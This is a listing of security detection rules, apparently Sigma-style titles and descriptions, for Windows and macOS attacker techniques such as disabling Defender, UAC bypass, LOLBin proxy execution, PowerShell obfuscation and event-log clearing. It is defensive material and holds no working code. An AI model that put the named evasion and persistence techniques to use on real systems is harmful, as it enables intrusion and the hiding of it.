status deprecated

Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.

Suspicious ZipExec Execution
level
status experimental

ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.

Suspicious VBoxDrvInst.exe Parameters
level
status test

Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys

Suspicious Usage of the Manage-bde.wsf Script
level
status experimental

Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script

Suspicious Task Added by Powershell
level
status experimental

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model

Suspicious Task Added by Bitsadmin
level
status experimental

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model

Suspicious Service Installed
level
status test

Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)

Suspicious Service Binary Directory
level
status experimental

Detects a service binary running in a suspicious directory

Suspicious Runscripthelper.exe
level
status test

Detects execution of powershell scripts via Runscripthelper.exe

Suspicious Rundll32 Without Any CommandLine Params
level
status experimental

Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity

Suspicious Rundll32 Setupapi.dll Activity
level
status test

setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.

Suspicious Rundll32 Script in CommandLine
level
status experimental

Detects suspicious process related to rundll32 based on arguments

Suspicious Rundll32 Invoking Inline VBScript
level
status experimental

Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452

Suspicious Rundll32 Activity Invoking Sys File
level
status experimental

Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452

Suspicious Registration via cscript.exe
level
status experimental

Detects when the registration of a VSS/VDS Provider as a COM+ application.

Suspicious PROCEXP152.sys File Created In TMP
level
status test

Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.

Suspicious PowerShell Command Line
level
status test

Detects the PowerShell command lines with special characters

Suspicious PowerShell Cmdline
level
status test

Detects the PowerShell command lines with reversed strings

Suspicious Parent of Csc.exe
level
status test

Detects a suspicious parent of csc.exe, which could by a sign of payload delivery

Suspicious OfflineScannerShell.exe Execution From Another Folder
level
status experimental

Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory

Suspicious Ntdll Pipe Redirection
level
status experimental

Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection

Suspicious Mount-DiskImage
level
status experimental

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

Suspicious Load of Advapi31.dll
level
status experimental

Detects the load of advapi31.dll by a process running in an uncommon folder

Suspicious IO.FileStream
level
status experimental

Open a handle on the drive volume via the \.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.

Suspicious Invoke-Item From Mount-DiskImage
level
status experimental

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

Suspicious GUP Usage
level
status test

Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks

Suspicious ftp.exe
level
status test

Detects renamed ftp.exe, ftp.exe script execution and child processes ran by ftp.exe

Suspicious Eventlog Clear or Configuration Using Wevtutil
level
status test

Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).

Suspicious Esentutl Use
level
status deprecated

Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.

Suspicious Driver Loaded By User
level
status test

Detects the loading of drivers via ‘SeLoadDriverPrivilege’ required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.

Suspicious Download File Extension with Bits
level
status experimental

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model

Suspicious Desktopimgdownldr Target File
level
status test

Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension

Suspicious Copy From or To System32
level
status test

Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name

Suspicious Calculator Usage
level
status test

Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion

Suspicious Auditpol Usage
level
status experimental

Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

Suspicious Atbroker Execution
level
status experimental

Atbroker executing non-deafualt Assistive Technology applications

Suspect Svchost Memory Asccess
level
status experimental

Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.

Suspcious CLR Logs Creation
level
status experimental

Detects suspicious .NET assembly executions. Could detect using Cobalt Strike’s command execute-assembly.

Stop Or Remove Antivirus Service
level
status experimental

Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service

Squirrel Lolbin
level
status experimental

Detects Possible Squirrel Packages Manager as Lolbin

SQL Client Tools PowerShell Session Detection
level
status test

This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

ShimCache Flush
level
status experimental

Detects actions that clear the local ShimCache and remove forensic evidence

Shadow Copies Deletion Using Operating Systems Utilities
level
status stable

Shadow Copies deletion using operating systems utilities

Set Windows System File with Attrib
level
status experimental

Marks a file as a system file using the attrib.exe utility

Run PowerShell Script from Redirected Input Stream
level
status test

Detects PowerShell script execution via input stream redirect

Run PowerShell Script from ADS
level
status test

Detects PowerShell script execution from Alternate Data Stream (ADS)

Run Once Task Execution as Configured in Registry
level
status test

This rule detects the execution of Run Once task as configured in the registry

Run Once Task Configuration in Registry
level
status test

Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup

Root Certificate Installed
level
status experimental

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Renamed PAExec
level
status experimental

Detects suspicious renamed PAExec execution as often used by attackers

Renamed MegaSync
level
status experimental

Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.

Renamed jusched.exe
level
status test

Detects renamed jusched.exe used by cobalt group

Remove Windows Defender Definition Files
level
status experimental

Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files

Removal of Potential COM Hijacking Registry Keys
level
status test

A General detection to trigger for processes removing .*\shell\open\command registry keys. Registry keys that might have been used for COM hijacking activities.

Removal Amsi Provider Reg Key
level
status experimental

Remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection

Remote Registry Management Using Reg Utility
level
status test

Remote registry management using REG utility from non-admin workstation

Remote Code Execute via Winrm.vbs
level
status test

Detects an attempt to execute code or create service on remote host via winrm.vbs.

RedMimicry Winnti Playbook Registry Manipulation
level
status test

Detects actions caused by the RedMimicry Winnti playbook

RedMimicry Winnti Playbook Execute
level
status test

Detects actions caused by the RedMimicry Winnti playbook

RedMimicry Winnti Playbook Dropped File
level
status test

Detects actions caused by the RedMimicry Winnti playbook

RdrLeakDiag Process Dump
level
status experimental

Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory

RDP Sensitive Settings Changed
level
status test

Detects changes to RDP terminal service sensitive settings

Raw Paste Service Access
level
status test

Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form

Raw Disk Access Using Illegitimate Tools
level
status test

Raw disk access using illegitimate tools, possible defence evasion

Raccine Uninstall
level
status experimental

Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.

Proxy Execution Via Explorer.exe
level
status test

Attackers can use explorer.exe for evading defense mechanisms

Process Dump via Comsvcs DLL
level
status test

Detects process memory dump via comsvcs.dll and rundll32

Powershell Used To Disable Windows Defender AV Security Monitoring
level
status experimental

Detects attackers attempting to disable Windows Defender using Powershell

Powershell Timestomp
level
status experimental

Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.

Powershell Store File In Alternate Data Stream
level
status experimental

Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.

PowerShell Encoded Character Syntax
level
status test

Detects suspicious encoded character syntax often used for defense evasion

Powershell Detect Virtualization Environment
level
status experimental

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox

PowerShell Deleted Mounted Share
level
status experimental

Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

Powershell Defender Exclusion
level
status experimental

Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets

Powershell Defender Disable Scan Feature
level
status experimental

Detects requests to disable Microsoft Defender features using PowerShell commands

Powershell Defender Base64 MpPreference
level
status experimental

Detects base64 encoded PowerShell code that modifies Windows Defender

PowerShell Called from an Executable Version Mismatch
level
status experimental

Detects PowerShell called from an executable by the version mismatch method

Possible Ransomware or Unauthorized MBR Modifications
level
status experimental

Detects, possibly, malicious unauthorized usage of bcdedit.exe

Possible Process Hollowing Image Loading
level
status test

Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz

PortProxy Registry Key
level
status experimental

Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.

Office Security Settings Changed
level
status experimental

Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)

Non-privileged Usage of Reg or Powershell
level
status test

Search for usage of reg or Powershell by non-priveleged users to modify service configuration in registry

Netsh RDP Port Opening
level
status test

Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware

Netsh RDP Port Forwarding
level
status test

Detects netsh commands that configure a port forwarding of port 3389 used for RDP

Netsh Port or Application Allowed
level
status test

Allow Incoming Connections by Port or Application on Windows Firewall

Netsh Port Forwarding
level
status experimental

Detects netsh commands that configure a port forwarding (PortProxy)

Netsh Allow Group Policy on Microsoft Defender Firewall
level
status experimental

Adversaries may modify system firewalls in order to bypass controls limiting network usage

Mshta Spawning Windows Shell
level
status experimental

Detects a suspicious child process of a mshta.exe process

Mounted Share Deleted
level
status test

Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

Monitoring Wuauclt.exe For Lolbas Execution Of DLL
level
status experimental

Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.

Monitoring Winget For LOLbin Execution
level
status experimental

Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe’s, msi, msix files later.

Monitoring For Persistence Via BITS
level
status experimental

BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded

Modifies the Registry From a File
level
status experimental

Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.

Modifies the Registry From a ADS
level
status experimental

Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.

Microsoft Malware Protection Engine Crash
level
status experimental

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

Microsoft Defender Tamper Protection Trigger
level
status stable

Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection

Malware Shellcode in Verclsid Target Process
level
status test

Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro

Malicious PE Execution by Microsoft Visual Studio Debugger
level
status experimental

There is an option for a MS VS Just-In-Time Debugger “vsjitdebugger.exe” to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.

Malicious Named Pipe
level
status experimental

Detects the creation of a named pipe used by known APT malware

Load Undocumented Autoelevated COM Interface
level
status test

COM interface (EditionUpgradeManager) that is not used by standard executables.

Lazarus Session Highjacker
level
status test

Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)

Invoke-Obfuscation Via Use Rundll32
level
status test

Detects Obfuscated Powershell via use Rundll32 in Scripts

Invoke-Obfuscation Via Use Rundll32
level
status experimental

Detects Obfuscated Powershell via use Rundll32 in Scripts

Invoke-Obfuscation Via Use Rundll32
level
status experimental

Detects Obfuscated Powershell via use Rundll32 in Scripts

Invoke-Obfuscation Via Use MSHTA
level
status test

Detects Obfuscated Powershell via use MSHTA in Scripts

Invoke-Obfuscation Via Use MSHTA
level
status experimental

Detects Obfuscated Powershell via use MSHTA in Scripts

Invoke-Obfuscation Via Use MSHTA
level
status experimental

Detects Obfuscated Powershell via use MSHTA in Scripts

Invoke-Obfuscation Via Use Clip
level
status test

Detects Obfuscated Powershell via use Clip.exe in Scripts

Invoke-Obfuscation Via Use Clip
level
status experimental

Detects Obfuscated Powershell via use Clip.exe in Scripts

Invoke-Obfuscation Via Use Clip
level
status experimental

Detects Obfuscated Powershell via use Clip.exe in Scripts

Invoke-Obfuscation Via Stdin
level
status test

Detects Obfuscated Powershell via Stdin in Scripts

Invoke-Obfuscation Via Stdin
level
status experimental

Detects Obfuscated Powershell via Stdin in Scripts

Invoke-Obfuscation Via Stdin
level
status experimental

Detects Obfuscated Powershell via Stdin in Scripts

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
level
status test

Detects Obfuscated Powershell via VAR++ LAUNCHER

Invoke-Obfuscation VAR+ Launcher
level
status test

Detects Obfuscated use of Environment Variables to execute PowerShell

Invoke-Obfuscation VAR+ Launcher
level
status experimental

Detects Obfuscated use of Environment Variables to execute PowerShell

Invoke-Obfuscation VAR+ Launcher
level
status experimental

Detects Obfuscated use of Environment Variables to execute PowerShell

Invoke-Obfuscation STDIN+ Launcher
level
status test

Detects Obfuscated use of stdin to execute PowerShell

Invoke-Obfuscation STDIN+ Launcher
level
status experimental

Detects Obfuscated use of stdin to execute PowerShell

Invoke-Obfuscation STDIN+ Launcher
level
status experimental

Detects Obfuscated use of stdin to execute PowerShell

Invoke-Obfuscation RUNDLL LAUNCHER
level
status test

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Invoke-Obfuscation RUNDLL LAUNCHER
level
status experimental

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Invoke-Obfuscation RUNDLL LAUNCHER
level
status experimental

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Invoke-Obfuscation COMPRESS OBFUSCATION
level
status test

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Invoke-Obfuscation COMPRESS OBFUSCATION
level
status experimental

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Invoke-Obfuscation COMPRESS OBFUSCATION
level
status experimental

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Invoke-Obfuscation CLIP+ Launcher
level
status test

Detects Obfuscated use of Clip.exe to execute PowerShell

Invoke-Obfuscation CLIP+ Launcher
level
status experimental

Detects Obfuscated use of Clip.exe to execute PowerShell

Invoke-Obfuscation CLIP+ Launcher
level
status experimental

Detects Obfuscated use of Clip.exe to execute PowerShell

Install Root Certificate
level
status test

Detects installed new certificate

InfDefaultInstall.exe .inf Execution
level
status experimental

Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.

Indirect Command Execution By Program Compatibility Wizard
level
status test

Detect indirect command execution via Program Compatibility Assistant pcwrun.exe

Imports Registry Key From an ADS
level
status test

Detects the import of a alternate datastream to the registry with regedit.exe.

Imports Registry Key From a File
level
status test

Detects the import of the specified file to the registry with regedit.exe.

Image Load of VSS_PS.dll by Uncommon Executable
level
status experimental

Detects the image load of vss_ps.dll by uncommon executables using OriginalFileName datapoint

HTML Help Shell Spawn
level
status test

Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)

High Integrity Sdclt Process
level
status test

A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.

Hidden User Creation
level
status test

Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option

Greenbug Campaign Indicators
level
status test

Detects tools and process executions as observed in a Greenbug campaign in May 2020

Gatekeeper Bypass via Xattr
level
status test

Detects macOS Gatekeeper bypass via xattr utility

Fsutil Suspicious Invocation
level
status test

Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).

Format.com FileSystem LOLBIN
level
status experimental

Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs

Firewall Disabled via Netsh
level
status test

Detects netsh commands that turns off the Windows firewall

Fireball Archer Install
level
status test

Detects Archer malware invocation via rundll32

Findstr Launching .lnk File
level
status test

Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack

File Time Attribute Change
level
status test

Detect file time attribute change to hide new or changes to existing files.

File Time Attribute Change
level
status test

Detect file time attribute change to hide new or changes to existing files.

File Deletion
level
status stable

Detects file deletion commands

Fax Service DLL Search Order Hijack
level
status test

The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.

Failed Code Integrity Checks
level
status stable

Code integrity failures may indicate tampered executables.

F-Secure C3 Load by Rundll32
level
status test

F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

Exports Registry Key To an Alternate Data Stream
level
status test

Exports the target Registry key and hides it in the specified alternate data stream.

Execution via CL_Mutexverifiers.ps1 (2 Lines)
level
status experimental

Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module

Execution via CL_Mutexverifiers.ps1
level
status experimental

Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module

Execution via CL_Mutexverifiers.ps1
level
status experimental

Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module

Execution via CL_Invocation.ps1 (2 Lines)
level
status experimental

Detects Execution via SyncInvoke in CL_Invocation.ps1 module

Execution via CL_Invocation.ps1
level
status experimental

Detects Execution via SyncInvoke in CL_Invocation.ps1 module

Execution via CL_Invocation.ps1
level
status experimental

Detects Execution via SyncInvoke in CL_Invocation.ps1 module

Execution of Suspicious File Type Extension
level
status experimental

Checks whether the image specified in a process creation event doesn’t refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)

Execution DLL of Choice Using WAB.EXE
level
status experimental

This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.

Execute From Alternate Data Streams
level
status experimental

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection

Execute Code with Pester.bat
level
status test

Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)

Executable in ADS
level
status test

Detects the creation of an ADS data stream that contains an executable (non-empty imphash)

Encoded PowerShell Command Line
level
status test

Detects specific combinations of encoding methods in the PowerShell command lines

Enabling COR Profiler Environment Variables
level
status test

This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.

Empty User Agent
level
status test

Detects suspicious empty user agent strings in proxy logs

Empire PowerShell UAC Bypass
level
status test

Detects some Empire PowerShell UAC bypass methods

Empire Monkey
level
status test

Detects EmpireMonkey APT reported Activity

Emissary Panda Malware SLLauncher
level
status test

Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27

Dynamic C Sharp Compile Artefact
level
status experimental

When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution

DumpStack.log Defender Evasion
level
status test

Detects the use of the filename DumpStack.log to evade Microsoft Defender

Download from Suspicious Dyndns Hosts
level
status test

Detects download of certain file types from hosts with dynamic DNS names (selected list)

DNS ServerLevelPluginDll Install
level
status experimental

Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)

DNS Server Error Failed Loading the ServerLevelPluginDLL
level
status test

This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded

Dllhost Internet Connection
level
status test

Detects Dllhost that communicates with public IP addresses

DLL Injection with Tracker.exe
level
status test

This rule detects DLL injection and execution via LOLBAS - Tracker.exe

DLL Execution Via Register-cimprovider.exe
level
status test

Detects using register-cimprovider.exe to execute arbitrary dll file.

DLL Execution via Rasautou.exe
level
status test

Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.

Disabled Volume Snapshots
level
status experimental

Detects commands that temporarily turn off Volume Snapshots

Disable Windows IIS HTTP Logging
level
status experimental

Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)

Disable UAC Using Registry
level
status experimental

Disable User Account Conrol (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0

Disable Tamper Protection on Windows Defender
level
status experimental

Detects disabling Windows Defender Tamper Protection

Disable Security Tools
level
status test

Detects disabling security tools

Disable PUA Protection on Windows Defender
level
status experimental

Detects disabling Windows Defender PUA protection

Disable or Delete Windows Eventlog
level
status experimental

Detects command that is used to disable or delete Windows eventlog via logman Windows utility

Disable Microsoft Office Security Features
level
status experimental

Disable Microsoft Office Security Features by registry

Disable Microsoft Defender Firewall via Registry
level
status experimental

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage

Disable Exploit Guard Network Protection on Windows Defender
level
status experimental

Detects disabling Windows Defender Exploit Guard Network Protection

Detection of PowerShell Execution via Sqlps.exe
level
status test

This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

Detecting Fake Instances Of Hxtsr.exe
level
status experimental

HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden “WindowsApps” subfolder of “C:\Program Files”. Its path includes a version number, e.g., “C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\HxTsr.exe”. Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe

Detect Virtualbox Driver Installation OR Starting Of VMs
level
status experimental

Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.

Decode Base64 Encoded Text
level
status test

Detects usage of base64 utility to decode arbitrary base64-encoded text

Decode Base64 Encoded Text
level
status test

Detects usage of base64 utility to decode arbitrary base64-encoded text

Custom Class Execution via Xwizard
level
status test

Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.

CreateDump Process Dump
level
status experimental

Detects uses of the createdump.exe LOLOBIN utility to dump process memory

CrackMapExec PowerShell Obfuscation
level
status test

The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.

Covenant Launcher Indicators
level
status test

Detects suspicious command lines used in Covenant luanchers

COMPlus_ETWEnabled Registry Modification
level
status test

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

COMPlus_ETWEnabled Registry Modification
level
status test

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

COMPlus_ETWEnabled Command Line Arguments
level
status test

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

Code Execution via Pcwutl.dll
level
status test

Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.

CobaltStrike Named Pipe
level
status experimental

Detects the creation of a named pipe as used by CobaltStrike

CobaltStrike Malformed UAs in Malleable Profiles
level
status experimental

Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike

CobaltStrike Load by Rundll32
level
status experimental

Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.

CobaltStrike BOF Injection Pattern
level
status experimental

Detects a typical pattern of a CobaltStrike BOF which inject into other processes

Cmd Stream Redirection
level
status experimental

Detects the redirection of an output stream of / within a Windows command line session

Certutil Encode
level
status test

Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration

CACTUSTORCH Remote Thread Creation
level
status experimental

Detects remote thread creation from CACTUSTORCH as described in references.

Bypass UAC Using SilentCleanup Task
level
status experimental

There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC

Bypass UAC Using DelegateExecute
level
status experimental

Bypasses User Account Control using a fileless method

Bitsadmin Download
level
status experimental

Detects usage of bitsadmin downloading a file

Binary Padding
level
status test

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.

Binary Padding
level
status test

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.

Base64 Encoded Reflective Assembly Load
level
status test

Detects base64 encoded .NET reflective loading of Assembly

Base64 Encoded Listing of Shadowcopy
level
status test

Detects base64 encoded listing Win32_Shadowcopy

Azure Service Principal Removed
level
status experimental

Identifies when a service principal was removed in Azure.

Azure Service Principal Created
level
status experimental

Identifies when a service principal is created in Azure.

Azure Owner Removed From Application or Service Principal
level
status experimental

Identifies when a owner is was removed from a application or service principal in Azure.

Azure Application Deleted
level
status experimental

Identifies when a application is deleted in Azure.

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl
level
status experimental

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

Atbroker Registry Change
level
status experimental

Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs

APT PRIVATELOG Image Load Pattern
level
status experimental

Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances

Abusing Windows Telemetry For Persistence
level
status experimental

Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.

Abusing Windows Telemetry For Persistence
level
status experimental

Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.

Abusing Print Executable
level
status test

Attackers can use print.exe for remote file copy

Abusing Findstr for Defense Evasion
level
status test

Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism

Sponsored by

Phish Report logo
With Phish Report you can achieve streamlined phishing takedowns using your existing security team.